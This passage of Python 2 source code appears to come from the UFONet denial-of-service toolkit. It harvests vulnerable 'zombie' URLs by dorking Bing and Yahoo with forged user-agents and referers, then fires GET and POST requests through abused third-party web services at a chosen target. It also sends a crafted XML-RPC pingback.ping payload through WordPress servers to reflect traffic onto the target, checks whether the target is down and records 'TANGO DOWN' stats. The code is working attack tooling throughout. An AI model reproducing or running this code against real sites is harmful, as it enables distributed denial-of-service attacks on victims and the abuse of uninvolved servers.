 1594. q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
 1595. start = 0 # set index number of first entry
 1596. query_string = { 'q':q, 'first':start }
 1597. data = urllib.urlencode(query_string)
 1598. url = url + data
 1599. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 1600. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1601. if options.verbose:
 1602. print("Query used: " + url + "\n")
 1603. try:
 1604. req = urllib2.Request(url, None, headers)
 1605. req_reply = urllib2.urlopen(req).read()
 1606. except:
 1607. print('[Error] - Unable to connect to bing\n')
 1608. if options.allengines or options.autosearch:
 1609. return
 1610. if not options.dorks or not options.autosearch:
 1611. if not self.options.forceyes:
 1612. update_reply = raw_input("Want to try a different search engine? (Y/n)")
 1613. else:
 1614. update_reply = "Y"
 1615. if update_reply == "n" or update_reply == "N":
 1616. return #sys.exit(2)
 1617. print "\nSearch engines available:"
 1618. print '-'*25
 1619. for e in self.search_engines:
 1620. print "+ "+e
 1621. print '-'*25
 1622. print "\nEx: ufonet -s 'proxy.php?url=' --se 'yahoo'"
 1623. return #sys.exit(2)
 1624. else:
 1625. req_reply = ''
 1626. regex = '<li class="b_algo"><h2><a href="(.+?)">' # regex magics
 1627. pattern = re.compile(regex)
 1628. url_links = re.findall(pattern, req_reply)
 1629. #elif options.engine == 'google': # google [07/10/2015: OK!] [09/08/2016: not working from TOR]
 1630. # url = 'https://www.google.com/xhtml?'
 1631. # if options.search: # search from query
 1632. # q = 'inurl:"' + str(options.search) + '"' # set query to search literally on results
 1633. # if options.dorks: # search from a dork
 1634. # q = 'inurl:"' + str(dork) + '"' # set query from a dork to search literally on results
 1635. # start = 0 # set index number of first entry
 1636. # if options.num_results: # set number of results to search
 1637. # try:
 1638. # num = int(options.num_results)
 1639. # except:
 1640. # print("You should specify an integer!!!. Using default value: 10\n")
 1641. # num = 10
 1642. # else:
 1643. # num = 10
 1644. # gws_rd = 'ssl' # set SSL as default
 1645. # query_string = { 'q':q, 'start':start, 'num':num, 'gws_rd':gws_rd }
 1646. # data = urllib.urlencode(query_string)
 1647. # url = url + data
 1648. # self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 1649. # headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1650. # if options.verbose:
 1651. # print("Query used: " + url + "\n")
 1652. # try:
 1653. # req = urllib2.Request(url, None, headers)
 1654. # req_reply = urllib2.urlopen(req).read()
 1655. # except:
 1656. # print('[Error] - Unable to connect to google\n')
 1657. # if options.allengines:
 1658. # return
 1659. # if not options.dorks:
 1660. # if not self.options.forceyes:
 1661. # update_reply = raw_input("Want to try a different search engine? (Y/n)")
 1662. # else:
 1663. # update_reply = "Y"
 1664. # if update_reply == "n" or update_reply == "N":
 1665. # return #sys.exit(2)
 1666. # print "\nSearch engines available:"
 1667. # print '-'*25
 1668. # for e in self.search_engines:
 1669. # print "+ "+e
 1670. # print '-'*25
 1671. # print "\nEx: ufonet -s 'proxy.php?url=' --se 'bing'"
 1672. # return #sys.exit(2)
 1673. # else:
 1674. # req_reply = ''
 1675. # regex = '<h3 class="r"><a href="/url(.+?)">' # regex magics
 1676. # pattern = re.compile(regex)
 1677. # url_links = re.findall(pattern, req_reply)
 1678. elif options.engine == 'yahoo': # yahoo [27/06/2017: OK!]
 1679. #location = ['fr', 'de', 'es', 'nl', 'it', 'se', 'ch', 'jp', 'ru', 'lt'] # generate 'flags' for location servers to evade Yahoo anti-dorking on main search webpage [grey magic: 18/08/2016]
 1680. location = ['fr', 'de', 'es', 'nl', 'se', 'ch', 'ru'] # [08/04/2017]
 1681. location = str(random.choice(location).strip()) # suffle location
 1682. url = 'https://'+location+'.search.yahoo.com/search?'
 1683. if options.search: # search from query
 1684. q = 'instreamset:(url):"' + str(options.search) + '"' # set query to search literally on results
 1685. if options.dorks or options.autosearch: # search from a dork
 1686. q = 'instreamset:(url):"' + str(dork) + '"' # set query from a dork to search literally on results
 1687. start = 0 # set index number of first entry
 1688. query_string = { 'p':q, 'b':start }
 1689. data = urllib.urlencode(query_string)
 1690. url = url + data
 1691. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 1692. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1693. if options.verbose:
 1694. print("Query used: " + url + "\n")
 1695. try:
 1696. req = urllib2.Request(url, None, headers)
 1697. req_reply = urllib2.urlopen(req).read()
 1698. except:
 1699. print('[Error] - Unable to connect to yahoo\n')
 1700. if options.allengines or options.autosearch:
 1701. return
 1702. if not options.dorks or not options.autosearch:
 1703. if not self.options.forceyes:
 1704. update_reply = raw_input("Want to try a different search engine? (Y/n)")
 1705. else:
 1706. update_reply = "Y"
 1707. if update_reply == "n" or update_reply == "N":
 1708. return #sys.exit(2)
 1709. print "\nSearch engines available:"
 1710. print '-'*25
 1711. for e in self.search_engines:
 1712. print "+ "+e
 1713. print '-'*25
 1714. print "\nEx: ufonet -s 'proxy.php?url=' --se 'bing'"
 1715. return #sys.exit(2)
 1716. else:
 1717. req_reply = ''
 1718. #regex = '<h3 class="title"><a style="color:#2C46C7" class=" td-u" href="(.+?)" target="_blank"' # regex magics [18/08/2016]
 1719. regex = 'href="(.+?)" target="_blank" data' # regex magics [08/04/2017]
 1720. pattern = re.compile(regex)
 1721. url_links = re.findall(pattern, req_reply)
 1722. #elif options.engine == 'yandex': # yandex [07/10/2015: OK!]
 1723. # url = 'https://yandex.ru/search/?'
 1724. # if options.search: # search from query
 1725. # q = 'inurl:"' + str(options.search) + '"' # set query to search literally on results
 1726. # if options.dorks or options.autosearch: # search from a dork
 1727. # q = 'inurl:"' + str(dork) + '"' # set query from a dork to search literally on results
 1728. # start = 0 # set index number of first entry
 1729. # lr = '213' # [27/06/2017: OK!]
 1730. # query_string = { 'text':q, 'lr':lr, 'p':start }
 1731. # data = urllib.urlencode(query_string)
 1732. # url = url + data
 1733. # self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 1734. # headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1735. # if options.verbose:
 1736. # print("Query used: " + url + "\n")
 1737. # try:
 1738. # req = urllib2.Request(url, None, headers)
 1739. # req_reply = urllib2.urlopen(req).read()
 1740. # except:
 1741. # print('[Error] - Unable to connect to yandex\n')
 1742. # if options.allengines or options.autosearch:
 1743. # return
 1744. # if not options.dorks or not options.autosearch:
 1745. # if not self.options.forceyes:
 1746. # update_reply = raw_input("Want to try a different search engine? (Y/n)")
 1747. # else:
 1748. # update_reply = "Y"
 1749. # if update_reply == "n" or update_reply == "N":
 1750. # return #sys.exit(2)
 1751. # print "\nSearch engines available:"
 1752. # print '-'*25
 1753. # for e in self.search_engines:
 1754. # print "+ "+e
 1755. # print '-'*25
 1756. # print "\nEx: ufonet -s 'proxy.php?url=' --se 'bing'"
 1757. # return #sys.exit(2)
 1758. # else:
 1759. # req_reply = ''
 1760. #regex = '<a class="link link_cropped_no serp-item__title-link" target="_blank" href="(.+?)"' # regex magics
 1761. # if 'captchaSound' in req_reply: # detecting captcha reply
 1762. # print "[Info] - This search engine is asking for a captcha...\n"
 1763. # if options.allengines or options.autosearch:
 1764. # url_links = "" # keep running!
 1765. # else:
 1766. # regex = 'target="_blank" href="(.+?)" onmousedown="rc' # [27/06/2017] regex magics
 1767. # pattern = re.compile(regex)
 1768. # url_links = re.findall(pattern, req_reply)
 1769. else: # no valid search engine
 1770. print('[Error] - This search engine is not supported!\n')
 1771. if not options.dorks or options.autosearch:
 1772. if not self.options.forceyes:
 1773. update_reply = raw_input("Want to try a different search engine? (Y/n)")
 1774. else:
 1775. update_reply = "Y"
 1776. if update_reply == "n" or update_reply == "N":
 1777. return #sys.exit(2)
 1778. print "\nSearch engines available:"
 1779. print '-'*25
 1780. for e in self.search_engines:
 1781. print "+ "+e
 1782. print '-'*25
 1783. print "\nEx: ufonet -s 'proxy.php?url=' --se 'bing'"
 1784. return #sys.exit(2)
 1785. else:
 1786. req_reply = ''
 1787. if options.num_results: # set number of results to search
 1788. try:
 1789. num = int(options.num_results)
 1790. except:
 1791. print("You should specify an integer!!!. Using default value: 10\n")
 1792. num = 10
 1793. else:
 1794. num = 10
 1795. total_results = 1
 1796. for url in url_links: # general parse on urls
 1797. if int(num) < int(total_results):
 1798. break
 1799. if options.engine == "bing":
 1800. if " h=" in url: # regex magics [18/08/2016]
 1801. url = url.rsplit('" h=',1)[0]
 1802. if options.engine == "yahoo":
 1803. if 'RU=' in url: # regex magics [18/08/2016]
 1804. url = url.rsplit('RU=',1)[1]
 1805. if 'UTF-8&u=' in url: # regex magics [05/02/2018]
 1806. url = url.rsplit('UTF-8&u=',1)[1]
 1807. #if options.engine == "yandex":
 1808. # if 'rel="' in url: # regex magics [27/06/2017]
 1809. # url = url.rsplit('rel=',1)[1]
 1810. total_results = total_results + 1 # results counter
 1811. url_link = url.strip('?q=') # parse url_links to retrieve only a url
 1812. url_link = urllib.unquote(url_link).decode('utf8') # unquote encoding
 1813. if options.search:
 1814. sep = str(options.search)
 1815. if options.dorks or options.autosearch:
 1816. sep = str(dork)
 1817. url_link = url_link.rsplit(sep, 1)[0] + sep
 1818. if 'href="' in url_link:
 1819. url_link = url_link.rsplit('href="', 1)[1]
 1820. if "instreamset" in url_link: # invalid zombie
 1821. url_link = "" # discarded
 1822. if '" ' in url_link:
 1823. url_link = url_link.rsplit('" ', 1)[1]
 1824. if options.engine in url_link:
 1825. url_link = "" # discarded
 1826. if 'http' not in url_link:
 1827. url_link = "" # discarded
 1828. else:
 1829. if url_link not in zombies and url_link+os.linesep not in zombies_found and url_link is not "": # AI mode (parsing search engines mixed pool and stored army)
 1830. print('+Victim found: ' + url_link)
 1831. print '-'*12
 1832. zombies.append(url_link)
 1833. else:
 1834. pass
 1835. if len(zombies) == 0: # print dorking results
 1836. print "[Info] - NOT any NEW victim(s) found for this query!"
 1837. if not options.dorks:
 1838. if not options.autosearch:
 1839. if not self.options.forceyes:
 1840. return #sys.exit(2)
 1841. print "\n" + '-'*44 + '\n'
 1842. self.total_possible_zombies = self.total_possible_zombies + len(zombies)
 1843. return zombies
 1844. def check_nat(self):
 1845. # check for NAT configuration
 1846. options = self.options
 1847. from urllib import urlopen
 1848. tor_reply = urllib2.urlopen("https://check.torproject.org").read() # check if TOR is enabled
 1849. your_ip = tor_reply.split('<strong>')[1].split('</strong>')[0].strip()
 1850. if not tor_reply or 'Congratulations' not in tor_reply:
 1851. print("[Info] It seems that you are not using TOR to recieve data. Good!\n")
 1852. else:
 1853. print("[Error] You are using TOR as public IP... It's not possible to NAT!\n")
 1854. self.nat_error_flag = "ON"
 1855. return #sys.exit(2)
 1856. try:
 1857. data = str(urlopen('http://checkip.dyndns.com/').read()) # check for public ip
 1858. self.pub_ip = re.compile(r'Address: (\d+\.\d+\.\d+\.\d+)').search(data).group(1)
 1859. except:
 1860. try: # another check for public ip
 1861. data = str(urlopen('http://whatismyip.org/').read())
 1862. self.pub_ip = re.compile(r'">(\d+\.\d+\.\d+\.\d+)</span>').search(data).group(1)
 1863. except:
 1864. print("[Error] Something wrong checking your public IP using an external service. Try it again!\n")
 1865. self.nat_error_flag = "ON"
 1866. return #sys.exit(2)
 1867. print " + Public: " + self.pub_ip + "\n"
 1868. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 1869. s.connect(('8.8.8.8', 0)) # connecting to a UDP address doesn't send packets (black magic)
 1870. self.local_ip = s.getsockname()[0]
 1871. print " + Local: " + self.local_ip + "\n"
 1872. print '='*22 + '\n'
 1873. def extract_ucavs(self):
 1874. # extract ucavs from file
 1875. options = self.options
 1876. try:
 1877. f = open(self.ucavs_file)
 1878. ucavs = f.readlines()
 1879. ucavs = [ ucav.replace('\n','') for ucav in ucavs ]
 1880. f.close()
 1881. if not ucavs:
 1882. print "\n[Error] - Imposible to retrieve 'ucavs' from file.\n"
 1883. return
 1884. else:
 1885. return ucavs
 1886. except:
 1887. if os.path.exists(self.ucavs_file) == True:
 1888. print '\n[Error] - Cannot open:', 'ucavs.txt', "\n"
 1889. return #sys.exit(2)
 1890. else:
 1891. print '\n[Error] - Cannot found:', 'ucavs.txt', "\n"
 1892. return #sys.exit(2)
 1893. def check_is_up(self, target):
 1894. # extract external status checkers, perform a request and check results
 1895. options = self.options
 1896. num_is_up = 0 # counter for 'up' reports
 1897. num_is_down = 0 # counter for 'down' reports
 1898. print "\n[Info] Flying some UCAV with 'heat-beam' weapons...\n"
 1899. ucavs = self.extract_ucavs() # extract ucavs from file
 1900. self.total_ucavs = len(ucavs) # add total of ucavs to stats
 1901. shuffle(ucavs) # suffle ucavs
 1902. for ucav in ucavs:
 1903. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 1904. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 1905. if target.startswith("http://"): # parse target for some checkers
 1906. target = target.replace('http://','')
 1907. elif target.startswith("https://"):
 1908. target = target.replace('https://','')
 1909. url = ucav + target
 1910. if options.verbose:
 1911. print("[Info] Sniping: " + url)
 1912. try:
 1913. if options.proxy: # set proxy
 1914. self.proxy_transport(options.proxy)
 1915. req = urllib2.Request(url, None, headers)
 1916. target_reply = urllib2.urlopen(req).read()
 1917. else:
 1918. req = urllib2.Request(url, None, headers)
 1919. target_reply = urllib2.urlopen(req, context=self.ctx).read()
 1920. self.ucavs_hit = self.ucavs_hit + 1 # add ucav hit to stats
 1921. except:
 1922. print "[Error] UCAV: " + ucav + " -> FAILED (cannot connect!)"
 1923. self.ucavs_fail = self.ucavs_fail + 1 # add ucav fail to stats
 1924. if not "is down" or not "looks down" in target_reply: # parse external service for reply
 1925. print "[Info] UCAV: " + ucav + " -> HIT! || Report: ONLINE! [Keep shooting!]"
 1926. num_is_up = num_is_up + 1
 1927. else:
 1928. print "[Info] UCAV: " + ucav + " -> FAILED? || Report: Target looks OFFLINE from here!!! ;-)"
 1929. num_is_down = num_is_down + 1
 1930. if num_is_down > 0 and num_is_up == 0: # check for: 1 or more down, 0 up
 1931. print "\n[Info] Congratulations!. Your target looks OFFLINE from external sources...\n"
 1932. if not self.options.forceyes:
 1933. update_reply = raw_input("Want to send a [HEAD] check request from your proxy? (y/N)")
 1934. print '-'*25
 1935. else:
 1936. update_reply = "N"
 1937. if update_reply == "y" or update_reply == "Y":
 1938. try: # send HEAD connection
 1939. self.head = True
 1940. reply = self.connect_zombie(target)
 1941. self.head = False
 1942. if reply:
 1943. print "\n[Info] Wow! Target is replying you... Keep shooting!\n"
 1944. else:
 1945. print "\n[Info] #UFONet TANGO DOWN!!! -> " +target + "\n"
 1946. self.update_targets_crashed() # update targets crashed stats
 1947. self.update_mothership_stats() # update mothership completed attack stats
 1948. if self.options.web:
 1949. return
 1950. else:
 1951. sys.exit(2) # Debug traceback (without crash) to celebrate it! ;-)
 1952. except Exception:
 1953. print "[Error] Something wrong with your connection!"
 1954. if self.options.verbose:
 1955. traceback.print_exc()
 1956. return #sys.exit(2)
 1957. else:
 1958. print "[Info] #UFONet TANGO DOWN!!! -> " +target + "\n"
 1959. self.update_targets_crashed() # update targets crashed stats
 1960. self.update_mothership_stats() # update mothership completed attack stats
 1961. if self.options.web:
 1962. return
 1963. else:
 1964. sys.exit(2) # Debug traceback (without crash) for celebrate it! ;-)
 1965. def send_aliens(self, target):
 1966. # extract external web abuse services urls (POST) and perform requests against target
 1967. options = self.options
 1968. print "\n[Info] Deploying heavy alien troops with 'laser-cannon' weapons...\n"
 1969. aliens = self.extract_aliens() # extract aliens from file
 1970. self.total_aliens = len(aliens) # add total of aliens to stats
 1971. shuffle(aliens) # suffle aliens
 1972. for alien in aliens:
 1973. if "$POST" in alien: # extract alien/parameters -> search for $POST delimiter on 'aliens.txt' file
 1974. regex_alien = re.compile('{}(.*){}'.format(re.escape(''), re.escape(';$POST'))) # regex magics
 1975. pattern_alien = re.compile(regex_alien)
 1976. alien_url = re.findall(pattern_alien, alien) # HTTP POST url for submit data
 1977. regex_param = re.compile('{}(.*){}'.format(re.escape('$POST;'), re.escape(''))) # regex magics
 1978. pattern_param = re.compile(regex_param)
 1979. param = re.findall(pattern_param, alien) # HTTP POST params to submit
 1980. for u in alien_url:
 1981. url = u # ex: POST -> path/submit.php
 1982. print "[Info] Firing from: " + url
 1983. for p in param:
 1984. param_target = {p : target} # ex POST -> url=target
 1985. param_target = urllib.urlencode(param_target)
 1986. try:
 1987. if options.verbose:
 1988. print "[Info] Sniping: " + url + " - POST:", param_target
 1989. req = urllib2.Request(url, param_target)
 1990. rsp = urllib2.urlopen(req)
 1991. #content = rsp.read()
 1992. self.aliens_hit = self.aliens_hit + 1 # add hit to aliens stats
 1993. except Exception:
 1994. print "[Error] Alien: " + alien + " -> FAILED (cannot connect!)"
 1995. self.aliens_fail = self.aliens_fail + 1 # add fail to aliens stats
 1996. def extract_aliens(self):
 1997. # extract aliens from file
 1998. options = self.options
 1999. try:
 2000. f = open(self.aliens_file)
 2001. aliens = f.readlines()
 2002. aliens = [ alien.replace('\n','') for alien in aliens ]
 2003. f.close()
 2004. if not aliens:
 2005. print "\n[Error] - Imposible to retrieve 'aliens' from file.\n"
 2006. return
 2007. else:
 2008. return aliens
 2009. except:
 2010. if os.path.exists(self.aliens_file) == True:
 2011. print '\n[Error] - Cannot open:', 'aliens.txt', "\n"
 2012. return #sys.exit(2)
 2013. else:
 2014. print '\n[Error] - Cannot found:', 'aliens.txt', "\n"
 2015. return #sys.exit(2)
 2016. def send_droids(self, target):
 2017. # extract external web abuse services urls (GET) and perform requests against target
 2018. options = self.options
 2019. print "\n[Info] Deploying droids with 'light-laser' weapons...\n"
 2020. droids = self.extract_droids() # extract droids from file
 2021. self.total_droids = len(droids) # add total of droids to stats
 2022. shuffle(droids) # suffle droids
 2023. target = urllib.unquote(target).decode('utf8') # parte urlencoding
 2024. if target.startswith('http://'): # remove http
 2025. target = target.replace('http://', '')
 2026. if target.startswith('https://'):
 2027. target = target.replace('https://', '') # remove https
 2028. for droid in droids:
 2029. if "$TARGET" in droid: # replace droid/parameter for target
 2030. url = droid.replace("$TARGET", target)
 2031. print "[Info] Firing from: " + url
 2032. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 2033. headers = {'User-Agent' : self.user_agent, 'Content-type' : "application/x-www-form-urlencoded", 'Referer' : self.referer, 'Connection' : 'keep-alive'} # set fake headers
 2034. try:
 2035. req = urllib2.Request(url, None, headers)
 2036. rsp = urllib2.urlopen(req)
 2037. self.droids_hit = self.droids_hit + 1 # add hit to droids stats
 2038. except Exception:
 2039. print "[Error] Droid: " + url + " -> FAILED (cannot connect!)"
 2040. self.droids_fail = self.droids_fail + 1 # add fail to droids stats
 2041. def extract_droids(self):
 2042. # extract droids from file
 2043. options = self.options
 2044. try:
 2045. f = open(self.droids_file)
 2046. droids = f.readlines()
 2047. droids = [ droid.replace('\n','') for droid in droids ]
 2048. f.close()
 2049. if not droids:
 2050. print "\n[Error] - Imposible to retrieve 'droids' from file.\n"
 2051. return
 2052. else:
 2053. return droids
 2054. except:
 2055. if os.path.exists(self.droids_file) == True:
 2056. print '\n[Error] - Cannot open:', 'droids.txt', "\n"
 2057. return #sys.exit(2)
 2058. else:
 2059. print '\n[Error] - Cannot found:', 'droids.txt', "\n"
 2060. return #sys.exit(2)
 2061. def send_rpcs(self, target):
 2062. # extract vulnerable XML-RPC pingback services and perform requests against target
 2063. print "\n[Info] Aiming 'plasma' cannon reflector turrets...\n"
 2064. rpcs = self.extract_rpcs() # extract rpcs from file
 2065. self.total_rpcs = len(rpcs) # add total of rpcs to stats
 2066. shuffle(rpcs) # suffle rpcs
 2067. def random_key(length):
 2068. key = ''
 2069. for i in range(length):
 2070. key += random.choice(string.lowercase + string.uppercase + string.digits)
 2071. return key
 2072. for rpc in rpcs:
 2073. print "[Info] Firing from: " + rpc
 2074. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 2075. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2076. key = random_key(8) # generate random value page to bypass cache
 2077. rpc_page = "?" + str(key)
 2078. key = random_key(6) # re-generate random value id to bypass cache
 2079. rpc_id = "=" + str(key)
 2080. target_place = target + rpc_page + rpc_id # random place to bypass cache (ex: www.target.com?U7OvBdp1=4lMcNj)
 2081. if "/xmlrpc.php" in rpc:
 2082. rpc_place = rpc.replace("xmlrpc.php", "")
 2083. rpc_exploit = "<methodCall><methodName>pingback.ping</methodName><params><param><value><string>"+target_place+"</string></value></param><param><value><string>"+rpc_place+"</string></value></param></params></methodCall>"
 2084. try:
 2085. req = urllib2.Request(rpc, rpc_exploit, headers)
 2086. target_reply = urllib2.urlopen(req, context=self.ctx).read()
 2087. self.rpcs_hit = self.rpcs_hit + 1 # add rpc hit to stats
 2088. if self.options.verbose:
 2089. print "Reply:", target_reply
 2090. except:
 2091. print "[Error] X-RPC: " + rpc + " -> FAILED (cannot connect!)"
 2092. self.rpcs_fail = self.rpcs_fail + 1 # add rpc fail to stats
 2093. def extract_rpcs(self):
 2094. # extract rpcs from file
 2095. options = self.options
 2096. try:
 2097. f = open(self.rpcs_file)
 2098. rpcs = f.readlines()
 2099. rpcs = [ rpc.replace('\r','') for rpc in rpcs ]
 2100. rpcs = [ rpc.replace('\n','') for rpc in rpcs ]
 2101. f.close()
 2102. if not rpcs:
 2103. print "\n[Error] - Imposible to retrieve 'rpcs' from file.\n"
 2104. return
 2105. else:
 2106. return rpcs
 2107. except:
 2108. if os.path.exists(self.rpcs_file) == True:
 2109. print '\n[Error] - Cannot open:', 'rpcs.txt', "\n"
 2110. return #sys.exit(2)
 2111. else:
 2112. print '\n[Error] - Cannot found:', 'rpcs.txt', "\n"
 2113. return #sys.exit(2)
 2114. def extract_zombies(self):
 2115. # extract targets from file
 2116. options = self.options
 2117. if self.options.test:
 2118. try:
 2119. f = open(options.test)
 2120. zombies = f.readlines()
 2121. zombies = [ zombie.replace('\n','') for zombie in zombies ]
 2122. f.close()
 2123. if not zombies:
 2124. print "\n[Error] - Imposible to extract 'zombies' from file "+options.test+".\n"
 2125. return
 2126. else:
 2127. return zombies
 2128. except:
 2129. if os.path.exists(options.test) == True:
 2130. print '\n[Error] - Cannot open:', options.test, "\n"
 2131. return #sys.exit(2)
 2132. else:
 2133. print '\n[Error] - Cannot found:', options.test, "\n"
 2134. return #sys.exit(2)
 2135. else:
 2136. try:
 2137. f = open(self.zombies_file)
 2138. zombies = f.readlines()
 2139. zombies = [ zombie.replace('\n','') for zombie in zombies ]
 2140. f.close()
 2141. if not zombies:
 2142. print "\n[Error] - Imposible to retrieve 'zombies' from file.\n"
 2143. return
 2144. else:
 2145. return zombies
 2146. except:
 2147. if os.path.exists(self.zombies_file) == True:
 2148. print '\n[Error] - Cannot open:', 'zombies.txt', "\n"
 2149. return #sys.exit(2)
 2150. else:
 2151. print '\n[Error] - Cannot found:', 'zombies.txt', "\n"
 2152. return #sys.exit(2)
 2153. def update_zombies(self, zombies_ready):
 2154. # update zombies on file
 2155. options = self.options
 2156. if options.attackme:
 2157. f = open(self.zombies_file, "w") # re-write list
 2158. for zombie in self.doll.real_zombies: # add only alien verified zombies
 2159. for x in zombie:
 2160. f.write(str(x) + os.linesep)
 2161. f.close()
 2162. if options.test or options.testall:
 2163. if not options.test:
 2164. options.test = self.zombies_file
 2165. f = open(options.test, "w") # re-write list only with zombies ready
 2166. for zombie in zombies_ready:
 2167. f.write(zombie + os.linesep)
 2168. f.close()
 2169. if options.search or options.dorks or options.autosearch or options.download: # append only new zombies to list (dorking supported)
 2170. f = open(self.zombies_file)
 2171. zombies_on_file = f.read().splitlines()
 2172. with open(self.zombies_file, "a") as zombie_list:
 2173. for zombie in zombies_ready:
 2174. if zombie not in zombies_on_file: # parse possible repetitions
 2175. zombie_list.write(zombie + os.linesep)
 2176. if options.download:
 2177. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 2178. else:
 2179. self.scanned_zombies = self.scanned_zombies + 1 # update scanner stats only with new zombies (dorking)
 2180. f.close()
 2181. def update_aliens(self, aliens_ready):
 2182. # update aliens on file
 2183. options = self.options
 2184. if options.download: # append only new aliens to list
 2185. f = open(self.aliens_file)
 2186. aliens_on_file = f.read().splitlines()
 2187. with open(self.aliens_file, "a") as alien_list:
 2188. for alien in aliens_ready:
 2189. if alien not in aliens_on_file: # parse possible repetitions
 2190. alien_list.write(alien + os.linesep)
 2191. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 2192. f.close()
 2193. def update_droids(self, droids_ready):
 2194. # update droids on file
 2195. options = self.options
 2196. if options.download: # append only new droids to list
 2197. f = open(self.droids_file)
 2198. droids_on_file = f.read().splitlines()
 2199. with open(self.droids_file, "a") as droid_list:
 2200. for droid in droids_ready:
 2201. if droid not in droids_on_file: # parse possible repetitions
 2202. droid_list.write(droid + os.linesep)
 2203. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 2204. f.close()
 2205. def update_ucavs(self, ucavs_ready):
 2206. # update ucavs on file
 2207. options = self.options
 2208. if options.download: # append only new ucavs to list
 2209. f = open(self.ucavs_file)
 2210. ucavs_on_file = f.read().splitlines()
 2211. with open(self.ucavs_file, "a") as ucav_list:
 2212. for ucav in ucavs_ready:
 2213. if ucav not in ucavs_on_file: # parse possible repetitions
 2214. ucav_list.write(ucav + os.linesep)
 2215. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 2216. f.close()
 2217. def update_rpcs(self, rpcs_ready):
 2218. # update rpcs on file
 2219. options = self.options
 2220. if options.testrpc or options.testall:
 2221. f = open(self.rpcs_file, "w") # re-write list
 2222. for rpc in rpcs_ready: # add only rpc verified zombies
 2223. f.write(rpc + os.linesep)
 2224. f.close()
 2225. if options.download: # append only new rpcs to list
 2226. f = open(self.rpcs_file)
 2227. rpcs_on_file = f.read().splitlines()
 2228. with open(self.rpcs_file, "a") as rpc_list:
 2229. for rpc in rpcs_ready:
 2230. if rpc not in rpcs_on_file: # parse possible repetitions
 2231. rpc_list.write(rpc + os.linesep)
 2232. self.trans_zombies = self.trans_zombies + 1 # update trans stats only with new zombies (blackhole)
 2233. f.close()
 2234. def search_rpc(self, rpc_host):
 2235. rpc_vulnerable = False
 2236. self.user_agent = random.choice(self.agents).strip() # suffle user-agent
 2237. headers = {'User-Agent' : self.user_agent, 'Referer' : self.referer} # set fake user-agent and referer
 2238. try:
 2239. if self.options.testall: # testing_all
 2240. req = urllib2.Request(rpc_host, None, headers)
 2241. rpc_code = urllib2.urlopen(req).read()
 2242. rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
 2243. for link in rpc_links:
 2244. if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
 2245. rpc_pingback_url = link[0]
 2246. rpc_vulnerable = True
 2247. break # found it!
 2248. else: # not any XML-RPC discovering methods are working
 2249. rpc_pingback_url = rpc_host + "/xmlrpc.php"
 2250. rpc_vulnerable = False
 2251. else:
 2252. if rpc_host.startswith("http://"):
 2253. rpc_host = rpc_host.replace("http://", "")
 2254. if rpc_host.startswith("https://"):
 2255. rpc_host = rpc_host.replace("https://", "")
 2256. rpc_host = urlparse(rpc_host)
 2257. rpc_path = rpc_host.path.replace("\r", "")
 2258. self.head = True # send HTTP HEAD request searching for: X-Pingback
 2259. reply = self.connect_zombie(rpc_path)
 2260. self.head = False
 2261. if "X-Pingback" in reply: # discovering pingback-enabled resources
 2262. m = re.search('X-Pingback: (.+?)\n', reply) # regex magics
 2263. rpc_pingback_url = m.group(1) # extract rpc server url
 2264. rpc_vulnerable = True
 2265. else: # not X-Pingback on HTTP Headers (search for <link rel="pingback"... on HTML/XHTML code)
 2266. req_rpc = urllib2.Request(rpc_host, None, headers)
 2267. req_rpc.get_method = lambda : 'GET'
 2268. rpc_code = urllib2.urlopen(req_rpc).read()
 2269. rpc_links = re.findall('"((http|ftp)s?://.*?)"', rpc_code)
 2270. for link in rpc_links:
 2271. if 'xmlrpc.php' in link[0] and not "rsd" in link[0]: # extract rpc server url (discarding 'rsd' url)
 2272. rpc_pingback_url = link[0]
 2273. rpc_vulnerable = True
 2274. break # found it!
 2275. else: # not any XML-RPC discovering methods are working
 2276. rpc_pingback_url = rpc_host + "/xmlrpc.php"
 2277. rpc_vulnerable = False
 2278. except: # something wrong discovering XML-RPC Pingback
 2279. rpc_vulnerable = False
 2280. rpc_pingback_url = False
 2281. return rpc_vulnerable, rpc_pingback_url
 2282. def testing_offline(self):
 2283. # check for zombies offline
 2284. print ("\nChecking for 'zombies' offline!\n")
 2285. print '='*35
 2286. zombies_online = 0
 2287. zombies_offline = 0
 2288. zombies = self.extract_zombies()
 2289. rpcs = self.extract_rpcs()
 2290. aliens = self.extract_aliens()
 2291. droids = self.extract_droids()
 2292. ucavs = self.extract_ucavs()
 2293. try:
 2294. botnet = zombies + rpcs + aliens + droids + ucavs
 2295. except:
 2296. return
 2297. discarded = [] # for discarded zombies
 2298. if not botnet:
 2299. return
 2300. self.head = True
 2301. for zombie in botnet:
 2302. zombie = str(zombie)
 2303. if zombie in zombies: # set zombie type (this way because cannot be same zombie with different type)
 2304. zombie_type = 'Zombie'
 2305. elif zombie in rpcs:
 2306. zombie_type = 'XML-RPC'
 2307. elif zombie in aliens:
 2308. zombie_type = 'Alien'
 2309. elif zombie in droids:
 2310. zombie_type = 'Droid'
 2311. elif zombie in ucavs:
 2312. zombie_type = 'UCAV'
 2313. t = urlparse(zombie)
 2314. name_zombie = t.netloc
 2315. if zombie_type == 'Alien': # 'Aliens' are made with keyword ;$POST;
 2316. sep = ';$POST;'
